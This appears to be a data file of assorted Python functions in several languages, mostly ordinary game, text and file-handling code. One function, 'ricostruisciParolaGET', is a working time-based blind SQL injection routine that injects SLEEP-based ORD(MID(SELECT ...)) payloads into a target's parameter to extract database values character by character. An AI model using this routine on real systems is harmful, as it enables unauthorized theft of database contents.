palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,0,1]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] ,palabra_cantidad[palabra_en_lista][1], int(palabra_cantidad[palabra_en_lista][2]) + 1]\n palabras_candidatas = [] \n palabra_cantidad = dict(sorted(palabra_cantidad.items())) #se ordena el diccionario alfabeticamente\n with open(\"palabras.csv\",\"w\") as palabras_csv: # se agrga el diccionario a un arcivo .csv\n for palabra in palabra_cantidad:\n palabras_csv.write(palabra)\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][0]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][1]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][2]))\n palabras_csv.write(\"\\n\")\n return palabra_cantidad", "def creaLE(venta): #Esta sección fue hecha por Ángel\n listaPGA = [] # Esto genera la lista necesaria para pasarlo al archivo\n for elemento in venta:\n listaN = elemento[0] + \",\"\n listaN += str(elemento[1]) + \"\\n\"\n listaPGA.append(listaN)\n return listaPGA", "def empezando_la_partida():\n #estas 2 funciones las importo al menu y al juego\n texto = ' Una vez empezada la partida se encuentran a disposición del jugador el tablero \\n'+\\\n 'y el atril con las fichas para poder jugar, simplemente dando click en la ficha\\n'+\\\n 'deseada y el casillero del tablero deseado podemos ir armando letra a letra la \\n'+\\\n 'palabra de nuestro turno, de esta forma, formando palabras válidas, aprovechando\\n'+\\\n 'los casilleros de bonus y evitando los casilleros de penalización, el jugador va\\n'+\\\n 'sumando puntos.\\n'+\\\n ' El objetivo del juego es obtener más puntos que la maquina antes de que se acabe\\n'+\\\n 'el tiempo, se acaben las fichas del juego o que ya no se puedan formar palabras.'\n return texto", "def saluda1(sujeto):\n print 'Hola '+sujeto+' !!'", "def acquisizioneParametri(self):\n\n messaggio =''\n\n try: \n self.__rete = slugify(self.ui.nomeRete.text())\n # controllo se la lunghezza del nome inserito sia > di 5 caratteri\n if(len(self.__rete) < 5 or len(self.__rete) > 30):\n\n messaggio = 'err: inserimento Nome'\n raise NameError\n \n # controllo che il nome scelto sia univoco\n isPresent = self.__NNNameCheck()\n if(isPresent):\n messaggio = 'err: nome già utilizzato'\n raise NameError\n\n # controlli su numero layer e numero nodi che siano >= 1\n # e che siano rispettivamente <= 20 e <= 50\n self.__layer = int(self.ui.nLayer.text())\n if(self.__layer < 1):\n messaggio = 'err: numero layer < 1'\n raise ValueError\n elif(self.__layer >= 20):\n messaggio = 'err: numero layer > 20'\n raise ValueError\n\n self.__nodi = int(self.ui.nNodi.text())\n if(self.__nodi < 1):\n messaggio = 'err: numero nodi < 1'\n raise ValueError\n if(self.__nodi >= 50):\n messaggio = 'err: numero nodi > 50'\n raise ValueError\n\n # salvataggio della funzione scelta\n self.__funzione = self.ui.funzione.currentText()\n \n # controllo che la percentuale di Vs sia < 25%\n # e che la percentuale di Ts sia > 75%\n if(self.__percentuale < 25):\n messaggio = 'err: suddivisione'\n raise ValueError\n if (self.__percentuale > 75):\n messaggio = 'err: suddivisione'\n raise ValueError\n\n # controllo che sia stato scelto effettivamente un dataset\n if(len(self.__dataSet) == 0):\n messaggio = 'err: dataSet errato'\n raise NameError\n\n # setto il tasto caricamento di una rete non cliccabile\n self.ui.but_caricaRete.setEnabled(False)\n\n # cambio nome del tasto convalida\n self.ui.but_convalida.setText('confermato')\n self.ui.comunicazione.setText('')\n #abilito salvataggio\n self.ui.but_salva.setEnabled(True)\n\n # settandola a True permetto che il training venga effettuato\n # dato che i dati inseriti sono validi\n self.__convalida = True\n return True\n except:\n # in caso di eccezzioni faccio comparire il messaggio\n self.ui.comunicazione.setText(messaggio)\n return False", "def __get_data(self):\n ips = self.server.JUGADORES.keys()\n convida = list(ips)\n retorno = \"\"\n for ip in ips:\n nick = self.server.JUGADORES[ip]['nick']\n tanque = self.server.JUGADORES[ip]['path']\n energia = self.server.JUGADORES[ip]['energia']\n vidas = self.server.JUGADORES[ip]['vidas']\n puntos = self.server.JUGADORES[ip]['puntos']\n posicion = self.server.JUGADORES[ip]['pos']\n bala = self.server.JUGADORES[ip]['bala']\n\n datos = \"%s,%s,%s,%s,%s,%s,%s,%s\" % (ip, nick, tanque,\n posicion, vidas, energia, puntos, bala)\n\n explosion = self.server.JUGADORES[ip]['explosiones'].get(\n self.client_address[0], False)\n if explosion:\n datos = \"%s,%s\" % (datos, explosion)\n del(self.server.JUGADORES[ip][\n 'explosiones'][self.client_address[0]])\n\n retorno = \"%s%s||\" % (retorno, datos)\n if vidas == 0:\n convida.remove(ip)\n\n if len(ips) > 1 and len(convida) == 1:\n return \"END\"\n else:\n return retorno.strip()", "def llegir_placa(p):\n\t# Obrim el fitxer\n\ts = \"\"\n\tf=open('places.dat','r+')\n\t# Calculem la posicio que volem mirar\n\tposicio = p*7\n\tf.seek(posicio)\n\ts+=f.read(7)\n\tf.close()\n\treturn s", "def agregar_bolsa(self, letra, cantidad):", "def encode_strings(self):\n self.version = u2b_if_py2(self.version)\n self.short = u2b_if_py2(self.short)\n self.description = u2b_if_py2(self.description)\n self.destination = [u2b_if_py2(m) for m in self.destination]", "def get_cmd_string(res, DVDFab_path, src_iso_path, client_dest_path): \n dest_path = change_fuhao(res[6])\n Dest = get_value(res[6], \"/DEST\")\n Mode = get_value(res[4], \"/MODE\")\n Src = get_value(src_iso_path, \"/SRC\")\n Audio = get_value(res[9], \"/AUDIO\")\n Audio_type = get_value(res[10], \"/AUDIOTYPE\")\n Change_play_order = get_value(res[11], \"/CHANGEPLAYORDER\")\n Copy_IFO = get_value(res[12], \"/COPYIFO\")\n Display_forced_sub = get_value(res[13], \"/DISPLAYFORCEDSUB\")\n Jump_menu = get_value(res[14], \"/JUMPMENU\")\n Jump_main = get_value(res[15], \"/JUMPMAIN\")\n Out_disc = get_value(res[16], \"/OUTDISC\")\n Path_player = get_value(res[17], \"/PATHPLAYER\")\n Preserve_menu_disc2 = get_value(res[18], \"/PRESERVEMENUDISC2\")\n Profile = get_value(res[19], \"/PROFILE\")\n Remove_DTS = get_value(res[20], \"/REMOVEDTS\")\n Remove_HD_audio = get_value(res[21], \"/REMOVEHDAUDIO\")\n Remove_menu = get_value(res[22], \"/REMOVEMENU\")\n Remove_PGC = get_value(res[23], \"/REMOVEPGC\")\n Rewind = get_value(res[24], \"/REWIND\")\n Subtitle = get_value(res[25], \"/SUBTITLE\")\n Title = get_value(res[26], \"/TITLE\")\n Volume = get_value(res[27], \"/VOLUME\")\n BD3DT = get_value(res[44], \"/BD3DCONVERTTYPE\")\n COMPRESSTOAC3 = get_value(res[45], \"/COMPRESSTOAC3\")\n Close = ' /CLOSE' \n Createminiso = ' /CREATEMINISO' if os.name == 'nt' else ''\n cmd_string = Mode + Src + Dest + Audio + Audio_type + Change_play_order + Copy_IFO + Display_forced_sub + Jump_menu + Jump_main\\\n + Out_disc + Path_player + Preserve_menu_disc2 + Profile + Remove_DTS + Remove_HD_audio + Remove_menu + Remove_PGC\\\n + Rewind + Subtitle + Title + Volume + BD3DT + COMPRESSTOAC3 + Close + Createminiso\n DVDFab_path_cmd_string = '\"' + DVDFab_path + '\"' + cmd_string \n initlog('the cmd_string: %s' % DVDFab_path_cmd_string)\n return DVDFab_path_cmd_string, dest_path", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def get_data(archivo):\n\n datos = commands.getoutput(\n 'file -ik %s%s%s' % (\"\\\"\", archivo, \"\\\"\"))\n\n retorno = \"\"\n\n for dat in datos.split(\":\")[1:]:\n retorno += \" %s\" % (dat)\n\n return retorno", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def preberi_pot(ukazi):", "def func_piezo(self,piezo):\n self.write('SOURce:VOLTage:PIEZo '+str(piezo))\n self.read()", "def geneA(nombreA,listaPGA): #Esta sección fue hecha por Ángel\n with open(nombreA + \".txt\", \"w\") as archivo:\n archivo.writelines(listaPGA)", "def mostrarSiglas(cadena):\n cadena_final = \"\"\n palabras = cadena.split(\" \")\n lista_iniciales = []\n for palabra in palabras: # recorro la palabra separada y saco la primera letra\n lista_iniciales.append(palabra[0])\n return cadena_final.join(lista_iniciales) # y aca devuelo la lisa convertida en str", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def psea(pname): # -> str:\n ...", "def cargar_mapa (self):\n\n stream_cargar = open ('yo_mapa.txt', 'rt',encoding=\"utf-8\")\n mapa=stream_cargar.readlines()\n \n a = mapa[0].split(\"X\")\n mapa__I=[]\n mapa__D=[]\n toca = \"izda\"\n for lista in a:\n pasar=\"X\"\n linea1=[]\n trozo=\"\"\n for i in lista:\n if pasar==\"X\":\n \n borrar = [\"[\",\"'\"]\n if i in borrar:\n pass\n elif i == \",\" or i == \"]\":\n linea1.append(trozo)\n trozo=\"\"\n pasar=\"V\"\n elif i == \"S\":\n toca=\"dxa\"\n else:\n trozo+=i\n\n else:\n pasar=\"X\"\n pass\n if toca == \"izda\":\n mapa__I.append(linea1)\n else:\n mapa__D.append(linea1)\n\n mapa_cargado=[]\n for i in range (len(mapa__I)):\n\n mapa_cargado.append(mapa__I[i]+mapa__D[i]) \n\n stream_cargar=(close)\n return mapa_cargado", "def getAll(nombre, apellidos):\n texto = getNombre(nombre) + '\\n' + getApellidos(apellidos) \n return texto\n pass", "def ricostruisciParolaGET(length, nomeTabella, nomeColonna, indice,condizioneWhere):\n # la funzione mid funzione in modo particolare l'indice parte da 1 e arriva fino all'effettiva lunghezza\n # della stringa\n\n value = \"\"\n for i in range(1, length + 1):\n trovato = False\n min = 0\n max = 256\n\n if (OptionConfiguration.typeOfValue == \"string\"):\n\n while (trovato == False):\n\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n # modifico il valore injectable\n if(condizioneWhere==None):\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n else:\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, condizioneWhere,indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n #print (data)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n #print (end-start),chr(mid),req.elapsed.total_seconds()\n\n if ((end - start) >= OptionConfiguration.timeToWait):\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start) >= OptionConfiguration.timeToWait):\n # carattere trovato\n trovato = True\n value = value + chr(mid)\n print chr(mid),\n break\n else:\n dataToSent = OptionConfiguration.data.copy()\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,\n condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start )>= OptionConfiguration.timeToWait):\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n min = mid + 1\n # sono nella meta inferiore\n else:\n max = mid-1\n else:\n break\n\n\n # parametro intero\n else:\n\n while (trovato == False):\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n\n # modifico il valore injectable\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, condizioneWhere,indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start) >= OptionConfiguration.timeToWait):\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start) >= OptionConfiguration.timeToWait):\n # carattere trovato\n trovato = True\n value = value + chr(mid)\n print chr(mid),\n break\n\n else:\n dataToSent = OptionConfiguration.data.copy()\n\n if(condizioneWhere==None):\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s)\" % (\n OptionConfiguration.timeToWait)\n else:\n\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,\n condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n data=creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start )>= OptionConfiguration.timeToWait):\n\n data = creaStringaGet(dataToSent)\n start = time.time()\n req = requests.post(\"%s?%s\" % (OptionConfiguration.destination[0], data))\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n\n min = mid + 1\n # sono nella meta inferiore\n\n else:\n max = mid-1\n else:\n print (OptionConfiguration.bcolors.BOLD + OptionConfiguration.bcolors.FAIL + \"Error value no find \" + OptionConfiguration.bcolors.ENDC)\n\n break\n\n print(\"\")\n print (OptionConfiguration.bcolors.BOLD+\"value find -> \"+value+OptionConfiguration.bcolors.ENDC)\n print(\"\")\n return value", "def put_str(file,tupla): \n if type(tupla)!=type((2,)):\n raise 'Need a tuple of variables'\n f=open(file,'w') \n for i in range(1,len(tupla)):\n if len(tupla[i])!=len(tupla[0]):\n raise 'Variable lists have different lenght'\n for i in range(len(tupla[0])):\n cosas=[]\n for j in range(len(tupla)):cosas.append(str(tupla[j][i]))\n f.write(join(cosas)+'\\n')\n f.close()", "def convert_txt_to_data():\n pass", "def tous_les_codages(nom_de_fichier1,nom_de_fichier2):\n with open(nom_de_fichier1,'r') as f :\n texte = f.read()\n for clef in range(26):\n texte_code = codage_texte(texte,clef)\n with open(nom_de_fichier2+'_{}'.format(transforme(clef))+'.txt','w') as f :\n f.write(texte_code)\n return None", "def load_PIC(self, edron: Dict[str, str]) -> None:\n ...", "def load():\n messagebox.showinfo(\"Information\", \"Veuillez entrer le nom du fichier dans la console.\")\n file_name = input(\"Nom du fichier : \")\n ferme_fenetre()\n Hitori(file_name)", "def jogo_do_galo(str1, str2):\r\n if not (str1 in ['X','O'] and type(str1)==str) or not (str2 in ['basico','normal','perfeito'] and type(str2)==str):\r\n raise ValueError('jogo_do_galo: algum dos argumentos e invalido')\r\n else:\r\n print(\"Bem-vindo ao JOGO DO GALO.\\nO jogador joga com '{}'.\".format(str1))\r\n tab = ((0,0,0),(0,0,0),(0,0,0))\r\n if str1=='X':\r\n jog = 1\r\n pos = escolher_posicao_manual(tab)\r\n tab = marcar_posicao(tab,jog,pos)\r\n print(tabuleiro_str(tab))\r\n else:\r\n jog = -1\r\n while len(obter_posicoes_livres(tab))!=0:\r\n print('Turno do computador ({}):'.format(str2))\r\n pos = escolher_posicao_auto(tab, -1*jog, str2)\r\n tab = marcar_posicao(tab,-1*jog,pos)\r\n print(tabuleiro_str(tab))\r\n if jogador_ganhador(tab) in [-1,1] or len(obter_posicoes_livres(tab))==0:\r\n break\r\n pos = escolher_posicao_manual(tab) \r\n tab = marcar_posicao(tab,jog,pos)\r\n print(tabuleiro_str(tab)) \r\n if jogador_ganhador(tab) in [-1,1] or len(obter_posicoes_livres(tab))==0:\r\n break\r\n \r\n if jogador_ganhador(tab) == 1:\r\n return 'X'\r\n elif jogador_ganhador(tab) == -1:\r\n return 'O' \r\n else:\r\n return 'EMPATE'", "def afficher_damier_ascii(infojeu):\n lignes = []\n lignes += list(\"Légende: 1=\"+ str(infojeu[\"joueurs\"][0][\"nom\"])+\n ', 2='+str(infojeu[\"joueurs\"][1][\"nom\"]) + \"\\n\")\n lignes += list(\" \"+\"-\"*35+\"\\n\")\n for i in range(1, 10):\n lignes += str(10-i) + \" | \"\n for j in range(1, 9):\n strplayer = \".\"\n if [j, 10-i] == infojeu[\"joueurs\"][0][\"pos\"]:\n strplayer = \"1\"\n elif [j, 10-i] == infojeu[\"joueurs\"][1][\"pos\"]:\n strplayer = \"2\"\n if [j+1, 10-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(strplayer + \" | \")\n elif [j+1, 9-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(strplayer + \" | \")\n else:\n lignes += list(strplayer + \" \")\n if [9, 10-i] == infojeu[\"joueurs\"][0][\"pos\"]:\n lignes += list(\"1 |\")\n elif [9, 10-i] == infojeu[\"joueurs\"][1][\"pos\"]:\n lignes += list(\"2 |\")\n else:\n lignes += list(\". |\")\n if i != 9:\n lignes += list(\"\\n |\")\n for k in range(1, 9):\n if i != 9:\n if [k, 10-i] in infojeu[\"murs\"][\"horizontaux\"]:\n lignes += list(\"----\")\n elif [k-1, 10-i] in infojeu[\"murs\"][\"horizontaux\"] and \\\n [k+1, 9-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(\"---|\")\n elif [k-1, 10-i] in infojeu[\"murs\"][\"horizontaux\"]:\n lignes += list(\"--- \")\n elif [k+1, 9-i] in infojeu[\"murs\"][\"verticaux\"]:\n lignes += list(\" |\")\n else:\n lignes += list(\" \")\n if i != 9:\n if [8, 10-i] in infojeu[\"murs\"][\"horizontaux\"]:\n lignes += list(\"---|\")\n else:\n lignes += list(\" |\")\n lignes += list(\"\\n\")\n lignes += list(\"--|\"+ \"-\"*35+\"\\n\")\n lignes += list(\" | 1 2 3 4 5 6 7 8 9\")\n lignes = ''.join(lignes)\n print(lignes)", "def cliquer_sur_unité(self):", "def codifica_fraza(fraza: str, codificare: str) -> str:\n fraza_codificata = \"\"\n for litera in fraza:\n fraza_codificata += codificare[ord(litera) - 97]\n return fraza_codificata", "def crearLBI(): # Esta sección fue hecha por Ángel\n with open(\"Inventario.txt\",\"r\") as myFile:\n dataString = myFile.readlines()\n \n dataNoBS = [] \n for elem in dataString:\n noBS = elem.rstrip()\n dataNoBS.append(noBS.split(\",\"))\n \n listaFinall = [] \n for elementos in dataNoBS:\n productt = elementos[0]\n precio = elementos[1]\n cantidad = int(elementos[2])\n categoria = elementos[3]\n listaFinall.append([productt,precio,cantidad,categoria])\n return listaFinall", "def localizar(self, nome, comando):\n local = self.orm.get_global(nome).local\n if 'info' in comando:\n return f'Descricao do local: {self.orm.get_mapa(local).info}'\n return f'voçê atualmente está {self.orm.get_mapa(local).nome_amigavel.split(\"|\")[1]}. ' + \\\n f'Voce pode ir para: {list(json.loads(self.orm.get_mapa(local).saidas).keys())}'", "def __str__(self):\t\t\n\t\tcadena = []\n\t\tactual = self.prim\t\t\n\t\twhile actual:\n\t\t\tif type(actual.dato) == str:\n\t\t\t\tcadena.append(\"'\" + str(actual.dato) + \"'\")\n\t\t\telse:\t\n\t\t\t\tcadena.append(str(actual.dato))\n\t\t\tactual = actual.prox\n\t\treturn \"[\" + \", \".join(cadena) + \"]\"", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def gerarPalavraSecreta():\n global palavraOculta\n for _ in range(len(palavraDoJogo)):\n palavraOculta += '*'\n print(palavraOculta)", "async def tamere(self):\n tamere = [\n \"Ta mère est tellement grosse que pour la voir entièrement, on doit reculer de trois pas.\",\n \"Ta mère est tellement grosse qu'il faut deux pokéflutes pour la réveiller.\",\n \"Ta mère est tellement grosse qu'il y a un décalage horaire entre ses deux fesses.\",\n \"Ta mère est tellement radine que, quand elle vomit, elle sert les dents pour garder les morceaux.\",\n \"Ta mère est tellement moche que ton père est capable de l'emmener au travail pour éviter de lui dire au revoir en l'embrassant.\",\n \"Ta mère est tellement vieille que quand elle pète, elle fait de la poussière.\",\n \"Ta mère est tellement desséchée que ses morpions ne se baladent jamais sans leur gourde perso.\",\n \"Ta mère est tellement grosse qu'elle a décroché le rôle de la grosse pierre roulante au casting d'Indiana Jones.\",\n \"Ta mère est tellement grosse qu'elle a été baptisée en mer.\",\n \"Ta mère est tellement pauvre que ce sont les pigeons qui lui jettent du pain.\",\n \"Ta mère est tellement moche que quand elle va à la banque ils coupent les caméras.\",\n \"Ta mère est tellement grosse que quand elle met des talons aiguilles, elle trouve du pétrole !\",\n \"Ta mère est tellement petite que sa tête pue des pieds.\",\n \"Ta mère est tellement vieille qu'elle fait du lait en poudre.\",\n \"Ta mère a tellement mauvaise haleine qu'on a l'impression qu'elle a l'anus derrière les dents.\",\n \"Si tu vois un bateau qui flotte sur l'eau c'est que ta mère n'est pas à bord.\",\n \"Ta mère est tellement grosse que lorsqu'elle tombe du lit elle tombe des deux bords.\",\n \"Ta mère est tellement grosse que pour la photographier il faut un satellite.\",\n \"Ta mère est tellement grosse que quand elle mange des cacahuètes, elle chie des Snickers.\",\n \"Ta mère est tellement grosse que lorsqu'elle se pèse, c'est son numéro de téléphone qui s'affiche !\",\n \"Si les femmes sont des fleurs, il faudrait changer l'eau de ta mère.\",\n \"Ta mère est tellement bête que quand ton père l'a demandée en mariage elle a dit oui\"\n ]\n print('Blague sur les daronnes')\n await self.bot.say(random.choice(tamere))", "def PPString(inp, mol, i, n, outFile):\n alchemy = re.compile('^\\w*2\\w*_\\d\\d\\d$')\n ppstr = re.sub('\\*', '', mol.string[i])\n if ppstr:\n PPStr = ppstr\n pp_root, pp_ext = os.path.split(ppstr)\n else:\n if inp.setting['pp_type'] == 'geodecker':\n element = mol.type_list[i].title()\n if 'd_shell' in inp.setting:\n if type(inp.setting['d_shell']) is not list:\n inp.setting['d_shell'] = [inp.setting['d_shell']]\n if qtk.n2ve(mol.type_list[i].title()) > 10:\n shell = '-d'\n elif 'd_shell' in inp.setting \\\n and element in inp.setting['d_shell']:\n shell = '-d'\n else:\n element = qtk.element[mol.type_list[i].title()]\n if element.group < 3 and mol.Z[i] > 1:\n if mol.Z[i] != 3:\n shell = '-sp'\n else:\n shell = '-s'\n else:\n shell = ''\n pp_xc_dict = {\n 'lda': 'pz',\n 'pbe0': 'pbe',\n 'b3lyp': 'blyp',\n }\n pp_xc = inp.setting['pp_theory'].lower()\n if pp_xc in pp_xc_dict:\n pp_xc = pp_xc_dict[pp_xc]\n PPStr = ''.join([c for c in mol.type_list[i] if not c.isdigit()])\\\n + '.' + pp_xc + shell + '-hgh.UPF'\n elif inp.setting['pp_type'] == 'cpmd':\n PPStr = PPName(inp, mol, i, n)\n xc = inp.setting['pp_theory'].lower()\n if not mol.string[i]:\n if inp.setting['pp_type'] == 'geodecker':\n PPCheck(pp_xc, mol.type_list[i].title(), PPStr)\n elif inp.setting['pp_type'] == 'cpmd':\n saved_pp = PPCheck_cpmd(pp_xc, mol.type_list[i].title(), PPStr)\n new_pp1 = saved_pp + '.UPF'\n conv_pp = sp.Popen(\"%s %s\" % \\\n (qtk.setting.espresso_cpmd2upf_exe, saved_pp),\n shell=True)\n conv_pp.wait()\n new_pp1_file = os.path.split(new_pp1)[1]\n new_pp1_trg = os.path.join(qtk.setting.espresso_pp, new_pp1_file)\n if not os.path.exists(new_pp1_trg):\n shutil.copy(new_pp1, qtk.setting.espresso_pp)\n PPStr = PPStr + '.UPF'\n\n elif alchemy.match(mol.string[i]):\n cpmd_pp = alchemyPP(xc, PPStr)\n new_pp1 = cpmd_pp + '.UPF'\n if not os.path.exists(new_pp1):\n qtk.report('espresso', \"rewrite Goedecker's PP to UPF\")\n conv_pp = sp.Popen(\"%s %s\" % \\\n (qtk.setting.espresso_cpmd2upf_exe, cpmd_pp),\n shell=True)\n conv_pp.wait()\n if conv_pp.returncode != 0:\n # dirty fix for espresso alchemy conversion routine\n qtk.warning('conversion failed..., trying path end points')\n root, _ = os.path.splitext(PPStr)\n element_str = re.sub('_.*', '', root)\n element1 = re.sub('2.*', '', element_str)\n element2 = re.sub('.*2', '', element_str)\n fraction = float(re.sub('.*_', '', root))/100\n if fraction == 0.0:\n strpp = element1 + \"_q\" + str(qtk.n2ve(element1)) +\\\n \"_\" + xc + '.psp'\n elif fraction == 1.0:\n strpp = element2 + \"_q\" + str(qtk.n2ve(element2)) +\\\n \"_\" + xc + '.psp'\n else:\n qtk.exit(\"PP conversion failed for intermediate lambda\")\n strpp = os.path.join(qtk.setting.cpmd_pp, strpp)\n conv_pp = sp.Popen(\"%s %s\" % \\\n (qtk.setting.espresso_cpmd2upf_exe, strpp),\n shell=True)\n conv_pp.wait()\n os.rename(strpp + '.UPF', new_pp1)\n new_pp1_file = os.path.split(new_pp1)[1]\n new_pp1_trg = os.path.join(qtk.setting.espresso_pp, new_pp1_file)\n if not os.path.exists(new_pp1_trg):\n shutil.copy(new_pp1, qtk.setting.espresso_pp)\n PPStr = PPStr + '.UPF'\n\n return PPStr", "def newprojCode_withNamed():\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\n\tproject_name = raw_input(\"*Nombre del Proyecto: \").lower()\n\n\tif project_name == \"\":\n\t\tcancel()\t\t#Si project_name esta vacio, se cierra directamente la aplicacion\n\n\tproject_languges = raw_input(\"*Lenguaje: \").upper()\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de 